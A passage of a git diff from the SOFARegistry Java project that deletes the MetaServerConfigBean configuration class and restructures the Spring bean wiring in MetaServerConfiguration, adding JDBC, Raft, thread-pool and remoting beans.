boolean isEnableMetrics(); - - /** - * decision mode enum - */ - enum DecisionMode { - RUNTIME, OFF - } - -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerConfigBean.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerConfigBean.java deleted file mode 100644 index bb484c923..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerConfigBean.java +++ /dev/null @@ -1,602 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.bootstrap; - -import com.alipay.sofa.registry.common.model.constants.ValueConstants; -import org.springframework.boot.context.properties.ConfigurationProperties; - -import java.io.File; - -/** - * - * @author shangyu.wh - * @version $Id: MetaServerConfigBean.java, v 0.1 2018-01-16 11:01 shangyu.wh Exp $ - */ -@ConfigurationProperties(prefix = MetaServerConfigBean.PREFIX) -public class MetaServerConfigBean implements MetaServerConfig { - - public static final String PREFIX = "meta.server"; - - private int sessionServerPort = 9610; - - private int dataServerPort = 9611; - - private int metaServerPort = 9612; - - private int httpServerPort = 9615; - - private int schedulerHeartbeatTimeout = 3; - - private int schedulerHeartbeatFirstDelay = 3; - - private int schedulerHeartbeatExpBackOffBound = 10; - - private int schedulerGetDataChangeTimeout = 10; - - private int schedulerGetDataChangeFirstDelay = 10; - - private int schedulerGetDataChangeExpBackOffBound = 20; - - private int schedulerConnectMetaServerTimeout = 3; - - private int schedulerConnectMetaServerFirstDelay = 3; - - private int schedulerConnectMetaServerExpBackOffBound = 10; - - private int schedulerCheckNodeListChangePushTimeout = 3; - - private int schedulerCheckNodeListChangePushFirstDelay = 1; - - private int schedulerCheckNodeListChangePushExpBackOffBound = 10; - - private int dataNodeExchangeTimeout = 3000; - - private int sessionNodeExchangeTimeout = 3000; - - private int metaNodeExchangeTimeout = 3000; - - private int dataCenterChangeNotifyTaskRetryTimes = 3; - - private int dataNodeChangePushTaskRetryTimes = 1; - - private int getDataCenterChangeListTaskRetryTimes = 3; - - private int receiveStatusConfirmNotifyTaskRetryTimes = 3; - - private int sessionNodeChangePushTaskRetryTimes = 3; - - /** - * Whether to enable metrics for node. - */ - private boolean enableMetrics = true; - - private DecisionMode decisionMode; - - private String raftDataPath = System - .getProperty("user.home") - + File.separator - + "raftData"; - - @Override - public int getSessionServerPort() { - return sessionServerPort; - } - - /** - * Setter method for property sessionServerPort. - * - * @param sessionServerPort value to be assigned to property sessionServerPort - */ - public void setSessionServerPort(int sessionServerPort) { - this.sessionServerPort = sessionServerPort; - } - - @Override - public int getDataServerPort() { - return dataServerPort; - } - - /** - * Setter method for property dataServerPort. - * - * @param dataServerPort value to be assigned to property dataServerPort - */ - public void setDataServerPort(int dataServerPort) { - this.dataServerPort = dataServerPort; - } - - @Override - public int getHttpServerPort() { - return httpServerPort; - } - - /** - * Setter method for property httpServerPort. - * - * @param httpServerPort value to be assigned to property httpServerPort - */ - public void setHttpServerPort(int httpServerPort) { - this.httpServerPort = httpServerPort; - } - - /** - * Getter method for property schedulerHeartbeatTimeout. - * - * @return property value of schedulerHeartbeatTimeout - */ - @Override - public int getSchedulerHeartbeatTimeout() { - return schedulerHeartbeatTimeout; - } - - /** - * Setter method for property schedulerHeartbeatTimeout. - * - * @param schedulerHeartbeatTimeout value to be assigned to property schedulerHeartbeatTimeout - */ - public void setSchedulerHeartbeatTimeout(int schedulerHeartbeatTimeout) { - this.schedulerHeartbeatTimeout = schedulerHeartbeatTimeout; - } - - /** - * Getter method for property schedulerHeartbeatFirstDelay. - * - * @return property value of schedulerHeartbeatFirstDelay - */ - @Override - public int getSchedulerHeartbeatFirstDelay() { - return schedulerHeartbeatFirstDelay; - } - - /** - * Setter method for property schedulerHeartbeatFirstDelay. - * - * @param schedulerHeartbeatFirstDelay value to be assigned to property schedulerHeartbeatFirstDelay - */ - public void setSchedulerHeartbeatFirstDelay(int schedulerHeartbeatFirstDelay) { - this.schedulerHeartbeatFirstDelay = schedulerHeartbeatFirstDelay; - } - - /** - * Getter method for property schedulerHeartbeatExpBackOffBound. - * - * @return property value of schedulerHeartbeatExpBackOffBound - */ - @Override - public int getSchedulerHeartbeatExpBackOffBound() { - return schedulerHeartbeatExpBackOffBound; - } - - /** - * Setter method for property schedulerHeartbeatExpBackOffBound. - * - * @param schedulerHeartbeatExpBackOffBound value to be assigned to property schedulerHeartbeatExpBackOffBound - */ - public void setSchedulerHeartbeatExpBackOffBound(int schedulerHeartbeatExpBackOffBound) { - this.schedulerHeartbeatExpBackOffBound = schedulerHeartbeatExpBackOffBound; - } - - @Override - public DecisionMode getDecisionMode() { - return decisionMode; - } - - /** - * Setter method for property decisionMode. - * - * @param decisionMode value to be assigned to property decisionMode - */ - public void setDecisionMode(DecisionMode decisionMode) { - this.decisionMode = decisionMode; - } - - /** - * Getter method for property dataNodeExchangeTimeout. - * - * @return property value of dataNodeExchangeTimeout - */ - @Override - public int getDataNodeExchangeTimeout() { - return dataNodeExchangeTimeout; - } - - /** - * Setter method for property dataNodeExchangeTimeout. - * - * @param dataNodeExchangeTimeout value to be assigned to property dataNodeExchangeTimeout - */ - public void setDataNodeExchangeTimeout(int dataNodeExchangeTimeout) { - this.dataNodeExchangeTimeout = dataNodeExchangeTimeout; - } - - /** - * Getter method for property sessionNodeExchangeTimeout. - * - * @return property value of sessionNodeExchangeTimeout - */ - @Override - public int getSessionNodeExchangeTimeout() { - return sessionNodeExchangeTimeout; - } - - /** - * Setter method for property sessionNodeExchangeTimeout. - * - * @param sessionNodeExchangeTimeout value to be assigned to property sessionNodeExchangeTimeout - */ - public void setSessionNodeExchangeTimeout(int sessionNodeExchangeTimeout) { - this.sessionNodeExchangeTimeout = sessionNodeExchangeTimeout; - } - - /** - * Getter method for property schedulerConnectMetaServerTimeout. - * - * @return property value of schedulerConnectMetaServerTimeout - */ - @Override - public int getSchedulerConnectMetaServerTimeout() { - return schedulerConnectMetaServerTimeout; - } - - /** - * Setter method for property schedulerConnectMetaServerTimeout. - * - * @param schedulerConnectMetaServerTimeout value to be assigned to property schedulerConnectMetaServerTimeout - */ - public void setSchedulerConnectMetaServerTimeout(int schedulerConnectMetaServerTimeout) { - this.schedulerConnectMetaServerTimeout = schedulerConnectMetaServerTimeout; - } - - /** - * Getter method for property schedulerConnectMetaServerFirstDelay. - * - * @return property value of schedulerConnectMetaServerFirstDelay - */ - @Override - public int getSchedulerConnectMetaServerFirstDelay() { - return schedulerConnectMetaServerFirstDelay; - } - - /** - * Setter method for property schedulerConnectMetaServerFirstDelay. - * - * @param schedulerConnectMetaServerFirstDelay value to be assigned to property schedulerConnectMetaServerFirstDelay - */ - public void setSchedulerConnectMetaServerFirstDelay(int schedulerConnectMetaServerFirstDelay) { - this.schedulerConnectMetaServerFirstDelay = schedulerConnectMetaServerFirstDelay; - } - - /** - * Getter method for property schedulerConnectMetaServerExpBackOffBound. - * - * @return property value of schedulerConnectMetaServerExpBackOffBound - */ - @Override - public int getSchedulerConnectMetaServerExpBackOffBound() { - return schedulerConnectMetaServerExpBackOffBound; - } - - /** - * Setter method for property schedulerConnectMetaServerExpBackOffBound. - * - * @param schedulerConnectMetaServerExpBackOffBound value to be assigned to property schedulerConnectMetaServerExpBackOffBound - */ - public void setSchedulerConnectMetaServerExpBackOffBound(int schedulerConnectMetaServerExpBackOffBound) { - this.schedulerConnectMetaServerExpBackOffBound = schedulerConnectMetaServerExpBackOffBound; - } - - /** - * Getter method for property metaServerPort. - * - * @return property value of metaServerPort - */ - @Override - public int getMetaServerPort() { - return metaServerPort; - } - - /** - * Setter method for property metaServerPort. - * - * @param metaServerPort value to be assigned to property metaServerPort - */ - public void setMetaServerPort(int metaServerPort) { - this.metaServerPort = metaServerPort; - } - - /** - * Getter method for property metaNodeExchangeTimeout. - * - * @return property value of metaNodeExchangeTimeout - */ - @Override - public int getMetaNodeExchangeTimeout() { - return metaNodeExchangeTimeout; - } - - /** - * Setter method for property metaNodeExchangeTimeout. - * - * @param metaNodeExchangeTimeout value to be assigned to property metaNodeExchangeTimeout - */ - public void setMetaNodeExchangeTimeout(int metaNodeExchangeTimeout) { - this.metaNodeExchangeTimeout = metaNodeExchangeTimeout; - } - - /** - * Getter method for property dataCenterChangeNotifyTaskRetryTimes. - * - * @return property value of dataCenterChangeNotifyTaskRetryTimes - */ - @Override - public int getDataCenterChangeNotifyTaskRetryTimes() { - return dataCenterChangeNotifyTaskRetryTimes; - } - - /** - * Setter method for property dataCenterChangeNotifyTaskRetryTimes. - * - * @param dataCenterChangeNotifyTaskRetryTimes value to be assigned to property dataCenterChangeNotifyTaskRetryTimes - */ - public void setDataCenterChangeNotifyTaskRetryTimes(int dataCenterChangeNotifyTaskRetryTimes) { - this.dataCenterChangeNotifyTaskRetryTimes = dataCenterChangeNotifyTaskRetryTimes; - } - - /** - * Getter method for property dataNodeChangePushTaskRetryTimes. - * - * @return property value of dataNodeChangePushTaskRetryTimes - */ - @Override - public int getDataNodeChangePushTaskRetryTimes() { - return dataNodeChangePushTaskRetryTimes; - } - - /** - * Setter method for property dataNodeChangePushTaskRetryTimes. - * - * @param dataNodeChangePushTaskRetryTimes value to be assigned to property dataNodeChangePushTaskRetryTimes - */ - public void setDataNodeChangePushTaskRetryTimes(int dataNodeChangePushTaskRetryTimes) { - this.dataNodeChangePushTaskRetryTimes = dataNodeChangePushTaskRetryTimes; - } - - /** - * Getter method for property getDataCenterChangeListTaskRetryTimes. - * - * @return property value of getDataCenterChangeListTaskRetryTimes - */ - @Override - public int getGetDataCenterChangeListTaskRetryTimes() { - return getDataCenterChangeListTaskRetryTimes; - } - - /** - * Setter method for property getDataCenterChangeListTaskRetryTimes. - * - * @param getDataCenterChangeListTaskRetryTimes value to be assigned to property getDataCenterChangeListTaskRetryTimes - */ - public void setGetDataCenterChangeListTaskRetryTimes(int getDataCenterChangeListTaskRetryTimes) { - this.getDataCenterChangeListTaskRetryTimes = getDataCenterChangeListTaskRetryTimes; - } - - /** - * Getter method for property receiveStatusConfirmNotifyTaskRetryTimes. - * - * @return property value of receiveStatusConfirmNotifyTaskRetryTimes - */ - @Override - public int getReceiveStatusConfirmNotifyTaskRetryTimes() { - return receiveStatusConfirmNotifyTaskRetryTimes; - } - - /** - * Setter method for property receiveStatusConfirmNotifyTaskRetryTimes. - * - * @param receiveStatusConfirmNotifyTaskRetryTimes value to be assigned to property receiveStatusConfirmNotifyTaskRetryTimes - */ - public void setReceiveStatusConfirmNotifyTaskRetryTimes(int receiveStatusConfirmNotifyTaskRetryTimes) { - this.receiveStatusConfirmNotifyTaskRetryTimes = receiveStatusConfirmNotifyTaskRetryTimes; - } - - /** - * Getter method for property sessionNodeChangePushTaskRetryTimes. - * - * @return property value of sessionNodeChangePushTaskRetryTimes - */ - @Override - public int getSessionNodeChangePushTaskRetryTimes() { - return sessionNodeChangePushTaskRetryTimes; - } - - /** - * Setter method for property sessionNodeChangePushTaskRetryTimes. - * - * @param sessionNodeChangePushTaskRetryTimes value to be assigned to property sessionNodeChangePushTaskRetryTimes - */ - public void setSessionNodeChangePushTaskRetryTimes(int sessionNodeChangePushTaskRetryTimes) { - this.sessionNodeChangePushTaskRetryTimes = sessionNodeChangePushTaskRetryTimes; - } - - /** - * Getter method for property schedulerCheckNodeListChangePushTimeout. - * - * @return property value of schedulerCheckNodeListChangePushTimeout - */ - @Override - public int getSchedulerCheckNodeListChangePushTimeout() { - return schedulerCheckNodeListChangePushTimeout; - } - - /** - * Setter method for property schedulerCheckNodeListChangePushTimeout. - * - * @param schedulerCheckNodeListChangePushTimeout value to be assigned to property schedulerCheckNodeListChangePushTimeout - */ - public void setSchedulerCheckNodeListChangePushTimeout(int schedulerCheckNodeListChangePushTimeout) { - this.schedulerCheckNodeListChangePushTimeout = schedulerCheckNodeListChangePushTimeout; - } - - /** - * Getter method for property schedulerCheckNodeListChangePushFirstDelay. - * - * @return property value of schedulerCheckNodeListChangePushFirstDelay - */ - @Override - public int getSchedulerCheckNodeListChangePushFirstDelay() { - return schedulerCheckNodeListChangePushFirstDelay; - } - - /** - * Setter method for property schedulerCheckNodeListChangePushFirstDelay. - * - * @param schedulerCheckNodeListChangePushFirstDelay value to be assigned to property schedulerCheckNodeListChangePushFirstDelay - */ - public void setSchedulerCheckNodeListChangePushFirstDelay(int schedulerCheckNodeListChangePushFirstDelay) { - this.schedulerCheckNodeListChangePushFirstDelay = schedulerCheckNodeListChangePushFirstDelay; - } - - /** - * Getter method for property schedulerCheckNodeListChangePushExpBackOffBound. - * - * @return property value of schedulerCheckNodeListChangePushExpBackOffBound - */ - @Override - public int getSchedulerCheckNodeListChangePushExpBackOffBound() { - return schedulerCheckNodeListChangePushExpBackOffBound; - } - - /** - * Setter method for property schedulerCheckNodeListChangePushExpBackOffBound. - * - * @param schedulerCheckNodeListChangePushExpBackOffBound value to be assigned to property - * schedulerCheckNodeListChangePushExpBackOffBound - */ - public void setSchedulerCheckNodeListChangePushExpBackOffBound(int schedulerCheckNodeListChangePushExpBackOffBound) { - this.schedulerCheckNodeListChangePushExpBackOffBound = schedulerCheckNodeListChangePushExpBackOffBound; - } - - /** - * Getter method for property schedulerGetDataChangeTimeout. - * - * @return property value of schedulerGetDataChangeTimeout - */ - @Override - public int getSchedulerGetDataChangeTimeout() { - return schedulerGetDataChangeTimeout; - } - - /** - * Setter method for property schedulerGetDataChangeTimeout. - * - * @param schedulerGetDataChangeTimeout value to be assigned to property schedulerGetDataChangeTimeout - */ - public void setSchedulerGetDataChangeTimeout(int schedulerGetDataChangeTimeout) { - this.schedulerGetDataChangeTimeout = schedulerGetDataChangeTimeout; - } - - /** - * Getter method for property schedulerGetDataChangeFirstDelay. - * - * @return property value of schedulerGetDataChangeFirstDelay - */ - @Override - public int getSchedulerGetDataChangeFirstDelay() { - return schedulerGetDataChangeFirstDelay; - } - - /** - * Setter method for property schedulerGetDataChangeFirstDelay. - * - * @param schedulerGetDataChangeFirstDelay value to be assigned to property schedulerGetDataChangeFirstDelay - */ - public void setSchedulerGetDataChangeFirstDelay(int schedulerGetDataChangeFirstDelay) { - this.schedulerGetDataChangeFirstDelay = schedulerGetDataChangeFirstDelay; - } - - /** - * Getter method for property schedulerGetDataChangeExpBackOffBound. - * - * @return property value of schedulerGetDataChangeExpBackOffBound - */ - @Override - public int getSchedulerGetDataChangeExpBackOffBound() { - return schedulerGetDataChangeExpBackOffBound; - } - - /** - * Setter method for property schedulerGetDataChangeExpBackOffBound. - * - * @param schedulerGetDataChangeExpBackOffBound value to be assigned to property schedulerGetDataChangeExpBackOffBound - */ - public void setSchedulerGetDataChangeExpBackOffBound(int schedulerGetDataChangeExpBackOffBound) { - this.schedulerGetDataChangeExpBackOffBound = schedulerGetDataChangeExpBackOffBound; - } - - /** - * Getter method for property raftGroup. - * - * @return property value of raftGroup - */ - @Override - public String getRaftGroup() { - return ValueConstants.RAFT_SERVER_GROUP; - } - - /** - * Getter method for property raftServerPort. - * - * @return property value of raftServerPort - */ - @Override - public int getRaftServerPort() { - return ValueConstants.RAFT_SERVER_PORT; - } - - /** - * Getter method for property raftDataPath. - * - * @return property value of raftDataPath - */ - @Override - public String getRaftDataPath() { - return raftDataPath; - } - - /** - * Setter method for property raftDataPath. - * - * @param raftDataPath value to be assigned to property raftDataPath - */ - public void setRaftDataPath(String raftDataPath) { - this.raftDataPath = raftDataPath; - } - - @Override - public boolean isEnableMetrics() { - return enableMetrics; - } - - /** - * Setter method for property enableMetrics. - * - * @param enableMetrics value to be assigned to property enableMetrics - */ - public void setEnableMetrics(boolean enableMetrics) { - this.enableMetrics = enableMetrics; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerConfiguration.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerConfiguration.java index 745881be0..ea1de4b82 100644 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerConfiguration.java +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerConfiguration.java @@ -16,66 +16,58 @@ */ package com.alipay.sofa.registry.server.meta.bootstrap; -import com.alipay.sofa.registry.jraft.service.PersistenceDataDBService; +import com.alipay.sofa.registry.jdbc.config.JdbcConfiguration; +import com.alipay.sofa.registry.jdbc.config.JdbcElectorConfiguration; +import com.alipay.sofa.registry.jraft.config.RaftConfiguration; import com.alipay.sofa.registry.remoting.bolt.exchange.BoltExchange; import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; import com.alipay.sofa.registry.remoting.jersey.exchange.JerseyExchange; -import com.alipay.sofa.registry.server.meta.executor.ExecutorManager; -import com.alipay.sofa.registry.server.meta.listener.DataNodeChangePushTaskListener; -import com.alipay.sofa.registry.server.meta.listener.PersistenceDataChangeNotifyTaskListener; -import com.alipay.sofa.registry.server.meta.listener.ReceiveStatusConfirmNotifyTaskListener; -import com.alipay.sofa.registry.server.meta.listener.SessionNodeChangePushTaskListener; -import com.alipay.sofa.registry.server.meta.node.NodeService; -import com.alipay.sofa.registry.server.meta.node.impl.DataNodeServiceImpl; -import com.alipay.sofa.registry.server.meta.node.impl.MetaNodeServiceImpl; -import com.alipay.sofa.registry.server.meta.node.impl.SessionNodeServiceImpl; -import com.alipay.sofa.registry.server.meta.registry.MetaServerRegistry; -import com.alipay.sofa.registry.server.meta.registry.Registry; +import com.alipay.sofa.registry.server.meta.MetaLeaderService.MetaLeaderElectorListener; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfigBean; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfigBeanProperty; +import com.alipay.sofa.registry.server.meta.provide.data.DefaultProvideDataService; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; import com.alipay.sofa.registry.server.meta.remoting.DataNodeExchanger; -import com.alipay.sofa.registry.server.meta.remoting.MetaClientExchanger; import com.alipay.sofa.registry.server.meta.remoting.MetaServerExchanger; -import com.alipay.sofa.registry.server.meta.remoting.RaftExchanger; import com.alipay.sofa.registry.server.meta.remoting.SessionNodeExchanger; -import com.alipay.sofa.registry.server.meta.remoting.connection.DataConnectionHandler; -import com.alipay.sofa.registry.server.meta.remoting.connection.MetaConnectionHandler; -import com.alipay.sofa.registry.server.meta.remoting.connection.SessionConnectionHandler; -import com.alipay.sofa.registry.server.meta.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.server.meta.remoting.handler.DataNodeHandler; +import com.alipay.sofa.registry.server.meta.remoting.connection.DataConnectionManager; +import com.alipay.sofa.registry.server.meta.remoting.connection.MetaConnectionManager; +import com.alipay.sofa.registry.server.meta.remoting.connection.SessionConnectionManager; import com.alipay.sofa.registry.server.meta.remoting.handler.FetchProvideDataRequestHandler; -import com.alipay.sofa.registry.server.meta.remoting.handler.GetChangeListRequestHandler; -import com.alipay.sofa.registry.server.meta.remoting.handler.GetNodesRequestHandler; -import com.alipay.sofa.registry.server.meta.remoting.handler.ReNewNodesRequestHandler; -import com.alipay.sofa.registry.server.meta.remoting.handler.SessionNodeHandler; -import com.alipay.sofa.registry.server.meta.repository.NodeConfirmStatusService; -import com.alipay.sofa.registry.server.meta.repository.RepositoryService; -import com.alipay.sofa.registry.server.meta.repository.VersionRepositoryService; -import com.alipay.sofa.registry.server.meta.repository.annotation.RaftAnnotationBeanPostProcessor; -import com.alipay.sofa.registry.server.meta.repository.service.DataConfirmStatusService; -import com.alipay.sofa.registry.server.meta.repository.service.DataRepositoryService; -import com.alipay.sofa.registry.server.meta.repository.service.MetaRepositoryService; -import com.alipay.sofa.registry.server.meta.repository.service.SessionConfirmStatusService; -import com.alipay.sofa.registry.server.meta.repository.service.SessionRepositoryService; -import com.alipay.sofa.registry.server.meta.repository.service.SessionVersionRepositoryService; -import com.alipay.sofa.registry.server.meta.resource.DecisionModeResource; +import com.alipay.sofa.registry.server.meta.remoting.handler.HeartbeatRequestHandler; +import com.alipay.sofa.registry.server.meta.remoting.handler.RegistryForbiddenServerHandler; +import com.alipay.sofa.registry.server.meta.remoting.meta.MetaNodeExchange; +import com.alipay.sofa.registry.server.meta.remoting.meta.MetaServerRenewService; +import com.alipay.sofa.registry.server.meta.resource.BlacklistDataResource; import com.alipay.sofa.registry.server.meta.resource.HealthResource; import com.alipay.sofa.registry.server.meta.resource.MetaDigestResource; -import com.alipay.sofa.registry.server.meta.resource.MetaStoreResource; -import com.alipay.sofa.registry.server.meta.resource.PersistentDataResource; +import com.alipay.sofa.registry.server.meta.resource.MetaLeaderResource; +import com.alipay.sofa.registry.server.meta.resource.ProvideDataResource; +import com.alipay.sofa.registry.server.meta.resource.RegistryCoreOpsResource; +import com.alipay.sofa.registry.server.meta.resource.SlotSyncResource; +import com.alipay.sofa.registry.server.meta.resource.SlotTableResource; import com.alipay.sofa.registry.server.meta.resource.StopPushDataResource; -import com.alipay.sofa.registry.server.meta.store.DataStoreService; -import com.alipay.sofa.registry.server.meta.store.MetaStoreService; -import com.alipay.sofa.registry.server.meta.store.SessionStoreService; -import com.alipay.sofa.registry.server.meta.store.StoreService; -import com.alipay.sofa.registry.server.meta.task.processor.DataNodeSingleTaskProcessor; -import com.alipay.sofa.registry.server.meta.task.processor.MetaNodeSingleTaskProcessor; -import com.alipay.sofa.registry.server.meta.task.processor.SessionNodeSingleTaskProcessor; -import com.alipay.sofa.registry.store.api.DBService; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; -import com.alipay.sofa.registry.task.listener.DefaultTaskListenerManager; -import com.alipay.sofa.registry.task.listener.TaskListener; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; +import com.alipay.sofa.registry.server.meta.resource.filter.LeaderAwareFilter; +import com.alipay.sofa.registry.server.meta.revision.AppRevisionHeartbeatService; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import com.alipay.sofa.registry.server.shared.resource.MetricsResource; +import com.alipay.sofa.registry.server.shared.resource.SlotGenericResource; +import com.alipay.sofa.registry.task.MetricsableThreadPoolExecutor; +import com.alipay.sofa.registry.util.DefaultExecutorFactory; +import com.alipay.sofa.registry.util.NamedThreadFactory; +import com.alipay.sofa.registry.util.OsUtils; import com.alipay.sofa.registry.util.PropertySplitter; +import com.google.common.collect.Lists; +import java.util.ArrayList; +import java.util.Collection; +import java.util.concurrent.ExecutorService; +import java.util.concurrent.LinkedBlockingQueue; +import java.util.concurrent.ScheduledExecutorService; +import java.util.concurrent.ScheduledThreadPoolExecutor; +import java.util.concurrent.ThreadPoolExecutor; +import java.util.concurrent.TimeUnit; import org.glassfish.jersey.jackson.JacksonFeature; import org.glassfish.jersey.server.ResourceConfig; import org.springframework.boot.autoconfigure.condition.ConditionalOnMissingBean; @@ -84,353 +76,278 @@ import org.springframework.context.annotation.Configuration; import org.springframework.context.annotation.Import; -import java.util.ArrayList; -import java.util.Collection; - /** - * * @author shangyu.wh * @version $Id: MetaServerConfiguration.java, v 0.1 2018-01-12 14:53 shangyu.wh Exp $ */ @Configuration -@Import(MetaServerInitializerConfiguration.class) +@Import({ + MetaServerInitializerConfiguration.class, + JdbcConfiguration.class, + JdbcElectorConfiguration.class, + RaftConfiguration.class +}) @EnableConfigurationProperties public class MetaServerConfiguration { + public static final String SHARED_SCHEDULE_EXECUTOR = "sharedScheduleExecutor"; + public static final String GLOBAL_EXECUTOR = "globalExecutor"; + + @Bean + @ConditionalOnMissingBean + public MetaServerBootstrap metaServerBootstrap() { + return new MetaServerBootstrap(); + } + + @Configuration + protected static class MetaServerConfigBeanConfiguration { + @Bean + @ConditionalOnMissingBean + public MetaServerConfig metaServerConfig() { + return new MetaServerConfigBean(); + } + + @Bean + public NodeConfig nodeConfig() { + return new NodeConfigBeanProperty(); + } + + @Bean(name = "PropertySplitter") + public PropertySplitter propertySplitter() { + return new PropertySplitter(); + } + } + + @Configuration + public static class ThreadPoolResourceConfiguration { + @Bean(name = GLOBAL_EXECUTOR) + public ExecutorService getGlobalExecutorService() { + int corePoolSize = Math.min(OsUtils.getCpuCount() * 2, 8); + int maxPoolSize = 50 * OsUtils.getCpuCount(); + DefaultExecutorFactory executorFactory = + DefaultExecutorFactory.builder() + .threadNamePrefix(GLOBAL_EXECUTOR) + .corePoolSize(corePoolSize) + .maxPoolSize(maxPoolSize) + .rejectedExecutionHandler(new ThreadPoolExecutor.AbortPolicy()) + .build(); + return executorFactory.create(); + } + + @Bean(name = SHARED_SCHEDULE_EXECUTOR) + public ScheduledExecutorService getScheduledService() { + return new ScheduledThreadPoolExecutor( + Math.min(OsUtils.getCpuCount() * 2, 12), + new NamedThreadFactory("MetaServerGlobalScheduler")); + } + } + + @Configuration + public static class MetaServerRemotingConfiguration { + + @Bean + public Exchange boltExchange() { + return new BoltExchange(); + } + + @Bean + public Exchange jerseyExchange() { + return new JerseyExchange(); + } + + @Bean(name = "sessionServerHandlers") + public Collection sessionServerHandlers() { + Collection list = new ArrayList<>(); + list.add(heartbeatRequestHandler()); + list.add(fetchProvideDataRequestHandler()); + list.add(registryForbiddenServerHandler()); + return list; + } + + @Bean(name = "dataServerHandlers") + public Collection dataServerHandlers() { + Collection list = new ArrayList<>(); + list.add(heartbeatRequestHandler()); + list.add(fetchProvideDataRequestHandler()); + list.add(registryForbiddenServerHandler()); + return list; + } + + @Bean(name = "metaServerHandlers") + public Collection metaServerHandlers() { + Collection list = new ArrayList<>(); + list.add(heartbeatRequestHandler()); + return list; + } + + @Bean + public SessionConnectionManager sessionConnectionManager() { + return new SessionConnectionManager(); + } + + @Bean + public DataConnectionManager dataConnectionManager() { + return new DataConnectionManager(); + } + + @Bean + public MetaConnectionManager metaConnectionManager() { + return new MetaConnectionManager(); + } + + @Bean + public HeartbeatRequestHandler heartbeatRequestHandler() { + return new HeartbeatRequestHandler(); + } + + @Bean + public FetchProvideDataRequestHandler fetchProvideDataRequestHandler() { + return new FetchProvideDataRequestHandler(); + } + + @Bean + public SessionNodeExchanger sessionNodeExchanger() { + return new SessionNodeExchanger(); + } + + @Bean + public DataNodeExchanger dataNodeExchanger() { + return new DataNodeExchanger(); + } + + @Bean + public MetaServerExchanger metaServerExchanger() { + return new MetaServerExchanger(); + } + + @Bean + public RegistryForbiddenServerHandler registryForbiddenServerHandler() { + return new RegistryForbiddenServerHandler(); + } + + @Bean + public MetaNodeExchange metaNodeExchange() { + return new MetaNodeExchange(); + } + + @Bean + public MetaServerRenewService metaServerRenewService() { + return new MetaServerRenewService(); + } + } + + @Configuration + public static class MetadataConfiguration { + + @Bean(name = "metaLeaderListeners") + public Collection metaLeaderListeners() { + return Lists.newArrayList(provideDataService()); + } + + @Bean + public ProvideDataService provideDataService() { + return new DefaultProvideDataService(); + } + + @Bean + public AppRevisionHeartbeatService appRevisionHeartbeatService() { + return new AppRevisionHeartbeatService(); + } + } + + @Configuration + public static class ResourceConfiguration { + + @Bean + public ResourceConfig jerseyResourceConfig() { + ResourceConfig resourceConfig = new ResourceConfig(); + resourceConfig.register(JacksonFeature.class); + return resourceConfig; + } + + @Bean + public LeaderAwareFilter leaderAwareFilter() { + return new LeaderAwareFilter(); + } + + @Bean + public ProvideDataResource provideDataResource() { + return new ProvideDataResource(); + } + + @Bean + public MetaDigestResource metaDigestResource() { + return new MetaDigestResource(); + } + + @Bean + public HealthResource healthResource() { + return new HealthResource(); + } + + @Bean + public MetaLeaderResource metaLeaderResource() { + return new MetaLeaderResource(); + } + @Bean @ConditionalOnMissingBean - public MetaServerBootstrap metaServerBootstrap() { - return new MetaServerBootstrap(); - } - - @Configuration - protected static class MetaServerConfigBeanConfiguration { - @Bean - @ConditionalOnMissingBean - public MetaServerConfig metaServerConfig() { - return new MetaServerConfigBean(); - } - - @Bean - public NodeConfig nodeConfig() { - return new NodeConfigBeanProperty(); - } - - @Bean(name = "PropertySplitter") - public PropertySplitter propertySplitter() { - return new PropertySplitter(); - } - } - - @Configuration - public static class MetaServerServiceConfiguration { - - @Bean - public Registry metaServerRegistry() { - return new MetaServerRegistry(); - } - - @Bean - public NodeService sessionNodeService() { - return new SessionNodeServiceImpl(); - } - - @Bean - public NodeService dataNodeService() { - return new DataNodeServiceImpl(); - } - - @Bean - public NodeService metaNodeService() { - return new MetaNodeServiceImpl(); - } - - @Bean - public ServiceFactory storeServiceFactory() { - return new ServiceFactory(); - } - - @Bean - public StoreService sessionStoreService() { - return new SessionStoreService(); - } - - @Bean - public StoreService dataStoreService() { - return new DataStoreService(); - } - - @Bean - public StoreService metaStoreService() { - return new MetaStoreService(); - } - - } - - @Configuration - public static class MetaServerRepositoryConfiguration { - @Bean - public RepositoryService dataRepositoryService() { - return new DataRepositoryService(); - } - - @Bean - public RepositoryService metaRepositoryService() { - return new MetaRepositoryService(); - } - - @Bean - public NodeConfirmStatusService dataConfirmStatusService() { - return new DataConfirmStatusService(); - } - - @Bean - public RepositoryService sessionRepositoryService() { - return new SessionRepositoryService(); - } - - @Bean - public VersionRepositoryService sessionVersionRepositoryService() { - return new SessionVersionRepositoryService(); 